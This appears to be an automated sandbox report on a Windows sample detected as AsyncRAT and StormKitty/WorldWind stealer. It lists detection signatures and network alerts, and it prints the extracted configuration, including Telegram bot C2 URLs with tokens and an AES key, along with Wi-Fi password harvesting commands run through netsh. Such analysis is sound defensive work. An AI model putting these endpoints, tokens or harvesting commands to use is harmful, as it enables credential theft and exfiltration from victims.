Edit tour

Windows Analysis Report
Client.exe

Overview

General Information

Sample name:	Client.exe
Analysis ID:	1501596
MD5:	e29ab30e42348ecf2831928b7b95d5d8
SHA1:	70ae302ae078326efbe444fd8158d2b104a06a69
SHA256:	58b1013f511e61f2ddfb547939895ec161ab8bc03f5413529f85f1a3272d38d4
Tags:	asyncratexeStormKittytelegram
Infos:

Detection

AsyncRAT, StormKitty, WorldWind Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected AsyncRAT

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected WorldWind Stealer

AI detected suspicious sample

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious desktop.ini Action

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Client.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\Client.exe" MD5: E29AB30E42348ECF2831928B7B95D5D8)

cmd.exe (PID: 3728 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3804 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 3660 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 1916 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 2976 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1592 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 3080 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 81099, "from": {"id": 5344934242, "is_bot": true, "first_name": "Hey skid, add me on discord: _marvim_", "username": "HackinGusers_databot"}, "chat": {"id": 1619136628, "first_name": "GarY", "username": "Sunny_Hooda_11", "type": "private"}, "date": 1724994853, "text": "\ud83d\udcc1 Uploading Log Folders..."}}]}

Threatname: AsyncRAT

{"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628", "Version": "", "AES_key": "E2j9KwmxA0fsDzIAwy8PM7JVSe3hqJOh", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "ET/+RjH00EM3iiOkuY/sXxZ/NfmN/AkPHfg68HIoAeGI4xaZ94k+Qq70XSkWDG5K2LFni9yeGdizCO5tqPVN8QTFBECU/VsJJ0Vd0X6zkPtrzhzBBtyMmqu1fZHO1EpHHiBx9dr0w5+5CA/DQOxlrpxzynR8uZ7OEe55UIhpOWHR3G8hDB2+xsX8pEIqupxNmPiRZ7vmugb1oLCdQI3ZmI1/qrf2NaSSmFXV7p9PYY1/zff/escBR7FUlD1Qqs/2Gz5XuDm6sjvRKtm8Ecj3fxECe4xJGFkm5vEdRDVySBBalcHFFXJg1AAp40klEIuVZwh0gLOhUcEKrPQADFf9n5h53h7IE1RdBb9WrflWuqu/mCsPHAaQ6Rb+BecWQRB+D6CJ9ghbUmh3Z4SeFi8i0qheKZuhncHrh3aHXXDoZ/TUu/ruvFv9pUF8TnY7/P1j4da3AxF4Gl9SLxHe28zCI/6qfzL+u/qRkIMg4yjAYbVgJfHx9HY0LNPYgqwoYdbmnMld1Llh1lgfF6USwbHbyXNX7zC1CTnFX81oBQhnRRcFnNrfvbonjVzJ2c/oBqiNUcSznYCIjkNQVfoL0QPRoEz2O3pXLnxUExOrXapnoNORkBlyFkgGZ5L3JQaifzdVTBJJSqKnUiND0Y1fiw5ZEllAkBxzhhN63H99VkDQHBQ=", "Group": "Default"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Client.exe	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Client.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
Client.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Client.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Client.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Client.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Client.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Client.exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x27d10:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Client.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x24291:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Client.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2636d:$s1: \VPN\NordVPN 0x26353:$s2: \VPN\OpenVPN 0x26335:$s3: \VPN\ProtonVPN
Client.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x24ac9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x24b3b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24bc5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24c57:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24cc1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24d33:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x24dc9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x24e59:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Client.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x4dc:$x3: StormKitty 0x1aa2c:$s1: GetBSSID 0x1e726:$s2: GetAntivirus 0x25779:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x259ab:$s6: "encrypted_key":"(.*?)"
Click to see the 7 entries

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x27b10:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x24091:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x318bc:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: Client.exe PID: 6940	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: Client.exe PID: 6940	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Client.exe PID: 6940	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: Client.exe PID: 6940	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Client.exe PID: 6940	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Client.exe PID: 6940	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x3c4c4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: Client.exe PID: 6940	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3afd3:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x5f75c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Client.exe.d00000.0.unpack	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
0.0.Client.exe.d00000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.0.Client.exe.d00000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.0.Client.exe.d00000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.Client.exe.d00000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.Client.exe.d00000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.0.Client.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x27d10:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.0.Client.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x24291:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.0.Client.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2636d:$s1: \VPN\NordVPN 0x26353:$s2: \VPN\OpenVPN 0x26335:$s3: \VPN\ProtonVPN
0.0.Client.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x24ac9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x24b3b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24bc5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24c57:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24cc1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24d33:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x24dc9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x24e59:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.0.Client.exe.d00000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x4dc:$x3: StormKitty 0x1aa2c:$s1: GetBSSID 0x1e726:$s2: GetAntivirus 0x25779:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x259ab:$s6: "encrypted_key":"(.*?)"
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\Client.exe, ProcessId: 6940, TargetFilename: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Client.exe", ParentImage: C:\Users\user\Desktop\Client.exe, ParentProcessId: 6940, ParentProcessName: Client.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 3728, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE StormKitty Data Exfil via Telegram - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-08-30T07:14:12.277282+0200
SID:	2031009
Severity:	1
Source Port:	49714
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE WorldWind Stealer Checkin via Telegram (GET) - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-08-30T07:14:12.277282+0200
SID:	2044766
Severity:	1
Source Port:	49714
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-08-30T07:14:13.361241+0200
SID:	2803305
Severity:	3
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-08-30T07:14:17.099187+0200
SID:	2044557
Severity:	1
Source Port:	49721
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Client.exe

Avira: detected

Found malware configuration

Source: Client.exe	Malware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628", "Version": "", "AES_key": "E2j9KwmxA0fsDzIAwy8PM7JVSe3hqJOh", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "ET/+RjH00EM3iiOkuY/sXxZ/NfmN/AkPHfg68HIoAeGI4xaZ94k+Qq70XSkWDG5K2LFni9yeGdizCO5tqPVN8QTFBECU/VsJJ0Vd0X6zkPtrzhzBBtyMmqu1fZHO1EpHHiBx9dr0w5+5CA/DQOxlrpxzynR8uZ7OEe55UIhpOWHR3G8hDB2+xsX8pEIqupxNmPiRZ7vmugb1oLCdQI3ZmI1/qrf2NaSSmFXV7p9PYY1/zff/escBR7FUlD1Qqs/2Gz5XuDm6sjvRKtm8Ecj3fxECe4xJGFkm5vEdRDVySBBalcHFFXJg1AAp40klEIuVZwh0gLOhUcEKrPQADFf9n5h53h7IE1RdBb9WrflWuqu/mCsPHAaQ6Rb+BecWQRB+D6CJ9ghbUmh3Z4SeFi8i0qheKZuhncHrh3aHXXDoZ/TUu/ruvFv9pUF8TnY7/P1j4da3AxF4Gl9SLxHe28zCI/6qfzL+u/qRkIMg4yjAYbVgJfHx9HY0LNPYgqwoYdbmnMld1Llh1lgfF6USwbHbyXNX7zC1CTnFX81oBQhnRRcFnNrfvbonjVzJ2c/oBqiNUcSznYCIjkNQVfoL0QPRoEz2O3pXLnxUExOrXapnoNORkBlyFkgGZ5L3JQaifzdVTBJJSqKnUiND0Y1fiw5ZEllAkBxzhhN63H99VkDQHBQ=", "Group": "Default"}
Source: Client.exe.6940.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 81099, "from": {"id": 5344934242, "is_bot": true, "first_name": "Hey skid, add me on discord: _marvim_", "username": "HackinGusers_databot"}, "chat": {"id": 1619136628, "first_name": "GarY", "username": "Sunny_Hooda_11", "type": "private"}, "date": 1724994853, "text": "\ud83d\udcc1 Uploading Log Folders..."}}]}

Multi AV Scanner detection for domain / URL

Source: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for submitted file

Source: Client.exe	ReversingLabs: Detection: 81%
Source: Client.exe	Virustotal: Detection: 89%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Client.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49714 version: TLS 1.2

Source: Client.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.6:49714 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.6:49714 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044557 - Severity 1 - ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) : 192.168.2.6:49721 -> 149.154.167.220:443

